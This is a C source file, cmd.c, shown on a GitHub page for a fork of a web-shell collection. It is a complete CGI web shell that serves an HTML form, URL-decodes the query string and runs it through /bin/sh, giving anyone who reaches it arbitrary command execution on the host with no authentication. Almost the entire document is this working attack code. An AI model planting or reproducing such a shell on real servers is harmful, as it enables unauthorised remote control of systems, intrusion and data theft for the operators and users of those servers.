forked from xl7dev/WebShell
-
Notifications
You must be signed in to change notification settings - Fork 0
/
cmd.c
executable file
·74 lines (54 loc) · 1.41 KB
/
cmd.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
//
// cmdcgi.exe 0.1 darkraver (12/05/2005)
//
#include <stdio.h>
char *uri_decode(char *uri) {
int i=0;
int ptr=0;
char *command;
char hexa[3];
char code;
command=(char *)malloc(strlen(uri));
for(i=0;i<strlen(uri);i++) {
switch(*(uri+i)) {
case '+':
*(command+ptr)=' ';
ptr++;
break;
case '%':
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
i+=2;
//printf("HEXA: %s\n", hexa);
sscanf(hexa, "%x", &code);
//printf("CODE: %c\n", code);
*(command+ptr)=code;
ptr++;
break;
default:
*(command+ptr)=*(uri+i);
ptr++;
break;
}
}
*(command+ptr)='\0';
return command;
}
int main(int argc, char **argv) {
char *cmd;
printf("Content-type: text/html\n\n");
printf("<html><body>\n");
cmd=(char *)getenv("QUERY_STRING");
if(!cmd || strlen(cmd)==0) {
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
printf("<input type=\"text\" name=\"cmd\">");
printf("<input type=\"submit\" value=\"Send\">");
printf("<br><br><hr></form>");
} else {
//printf("QUERY_STRING: %s\n", cmd);
cmd+=4;
cmd=uri_decode(cmd);
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
fflush(stdout);
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
}
}